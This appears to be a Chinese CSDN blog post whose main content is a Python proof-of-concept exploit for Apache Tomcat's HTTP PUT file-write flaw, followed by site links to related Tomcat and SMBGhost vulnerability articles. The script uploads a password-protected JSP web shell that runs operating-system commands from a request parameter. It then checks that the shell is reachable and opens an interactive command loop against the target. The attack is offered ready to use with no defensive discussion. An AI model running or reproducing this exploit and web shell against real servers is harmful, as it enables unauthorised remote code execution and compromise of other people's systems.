tomcat_put写入POC.py

已于 2023-06-07 15:50:29 修改
阅读量84 收藏
点赞数
文章标签: python
于 2023-06-07 15:48:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57053860/article/details/131089460
版权 
import requests


def title():
    print('+------------------------------------------')
    print('+  \033[34mVersion: Tomcat PUT文件写入                               \033[0m')
    print('+  \033[36m(Y/N)  >>> 2023年5月23日                                                  \033[0m')
    print('+  \033[36mcmd    >>> ip addr                                             \033[0m')
    print('+------------------------------------------')


def poc_1(url,jsp):
    url1 = url + jsp
    body = '''<%
        if("023".equals(request.getParameter("pwd"))){
            java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
            int a = -1;
            byte[] b = new byte[2048];
            out.print("<pre>");
            while((a=in.read(b))!=-1){
                out.println(new String(b));
            }
            out.print("</pre>");
        }
    %>'''
    requests.put(url=url1, data=body)
    url2 = url1[:-1]
    qe = requests.get(url2)
    if qe.status_code == 200:
        print('漏洞存在,可执行命令')
    else:
        print('没有漏洞')
def poc_2(url):
    try:
        while True:
            shell = input('$')
            reqw = requests.get(url+'?pwd=023&i='+shell)
            print(reqw.text)
    except:
        pass


if __name__ == '__main__':
    title()
    url = input('$请输入目标url:')
    jsp = input('$请输入要保存的jsp文件:')
    poc_1(url,jsp)
    url1 = url + jsp
    url2 = url1[:-1]
    poc_2(url2)
qq_57053860
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Apache Tomcat AJP文件包含漏洞复现(CVE-2020-1938)
谢公子的博客
02-21 7259
目录 背景 漏洞编号 漏洞等级 漏洞影响版本 漏洞复现 漏洞修复建议 背景 2020年02月20日, 国家信息安全漏洞共享平台(CNVD) 收录了CNVD-2020-10487Apache Tomcat文件包含漏洞 Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和...
Apache Tomcat任意文件读取漏洞POC测试(CVE-2020-1938)
午夜安全
03-27 5217
CVE-2020-1938(POC测试) 1.背景 Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服...
幽灵猫 Tomcat文件读取/任意文件包含漏洞(CVE-2020-1938 / CNVD-2020-10487)
m0_62466350的博客
05-11 3717
该漏洞是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
Tomcat任意文件上传(CVE-2017-12615)漏洞复现(附POC
byt8563的博客
06-30 3795
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞 • 漏洞编号:CVE-2017-12615 • 漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
Linux安装部署Tomcat服务器
qq_44424791的博客
10-25 658
Tomcat Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的...
pwnserver:一个支持高度自定义POC的漏洞扫描工具
04-15
PwnServer版本1.0.2 更新: 加快端口扫描 模块化支持 准确的服务信息扫描 指定用于漏洞扫描的服务 CMS版本信息扫描 显示IP地址位置信息 错误修复 自述文件: EnglishРусский 用法: 请检查项目 。
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客...
GTAO_Booster_PoC.zip
09-27
"GTAO_Booster_PoC.zip" 文件可能包含了关于如何提高GTA Online游戏性能的Proof of Concept(PoC,概念验证)资料。这种PoC通常是技术爱好者或开发者为了展示特定优化技术或工具效果而创建的,旨在证明其能够改善...
判断tomcat是否启动成功_Tomcat 服务的下载和安装
weixin_39539002的博客
11-24 1488
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳...
Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC
浮生若梦的专栏
10-08 1万+
就在各位欢度国庆的时候,Tomcat于10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不大,受影响的用户需要特别关注。 Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Ap
Tomcat远程任意代码执行漏洞及其POC(CVE-2017-12617)
weixin_30825581的博客
03-07 660
一、原理分析: 只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false,则Tomcat可以不经任何身份验证的控制直接接收PUT方式上传的文件,无论上传者是任何人,也无论上传的是任何文件。此时可以上传jsp文件,直接执行jsp代码。 二、实例分析: 我们上传1.txt,直接返回了201成功 不幸的是找到的这个环境对jsp上传是...
Tomcat任意文件上传漏洞CVE-2017-12615复现测试
热门推荐
黑面狐
09-20 3万+
今天爆出了一个tomcat7的任意文件上传漏洞,看了大牛们的分析后,我自己本地搭建环境复测。 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 我本地下载的是tomcat7.0.56版本测试 测试过程: 1.下载tomcat7.0.0-7.0.81版本,解压后修改conf/web.xml文件添加readonly参数,属性值为false 如图: 然后启动tom
随机数种子的作用
帆的博客
07-23 1097
设置随机数种子(random seed)的目的是为了确保随机数生成器在每次运行时产生相同的随机数序列,从而保证实验结果的一致性。随机数种子通过初始化随机数生成器的内部状态,使得在相同的种子值下,随机数生成器每次调用时生成的序列是相同的。
Java-Lambda
lizhiwei21的博客
07-21 484
lambda表达式可以理解为对匿名内部类的一种简化 , 但是本质是有区别的面向对象思想 :强调的是用对象去完成某些功能函数式编程思想 :强调的是结果 , 而不是怎么去做。
使用9种方法隐藏和显示元素
lulei5153的博客
07-21 202
【代码】使用9种方法隐藏和显示元素。
提取autocad2024图形中图块的属性的代码-统计选中图块长度属性的总长度
VB973490770的专栏
07-24 110
阀门位号:XV-123。
Python数据增强】图像数据集扩充
最新发布
阿齐Archie
07-25 679
该脚本用于图像数据增强,特别是目标检测任务中的图像和标签数据增强。通过应用一系列数据增强技术(如旋转、平移、裁剪、加噪声、改变亮度、cutout、翻转等),生成多样化的图像数据集,以提高目标检测模型的鲁棒性和准确性。
d:/develop/coating_poc/data_exploration_and_analysis.py Traceback (most recent call last): File "d:\develop\coating_poc\data_exploration_and_analysis.py", line 11, in <module> print(data.head(chunk)) AttributeError: 'TextFileReader' object has no attribute 'head'
06-06
根据你提供的错误提示,我们可以看出是在d:/develop/coating_poc/data_exploration_and_analysis.py文件的第11行出现了问题。错误提示说 'TextFileReader' 对象没有 'head' 属性,这可能是因为你正在尝试在 'TextFileReader' 对象上调用 'head' 方法,但是 'head' 方法只能在 pandas.DataFrame 对象上调用。 解决方法可能是需要在 'TextFileReader' 对象上调用 'get_chunk()' 方法,然后将返回的结果转换为 pandas.DataFrame 对象,然后才能使用 'head()' 方法。例如,你可以尝试这样做: ``` import pandas as pd # 假设你正在使用 pandas.read_csv() 方法读取一个大文件 data_reader = pd.read_csv('your_data_file.csv', chunksize=1000) # 使用 for 循环遍历每个数据块 for chunk in data_reader: # 对每个数据块进行必要的数据探索和分析 print(chunk.head()) ``` 这样做可能会更稳健。希望这能帮助你解决问题!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值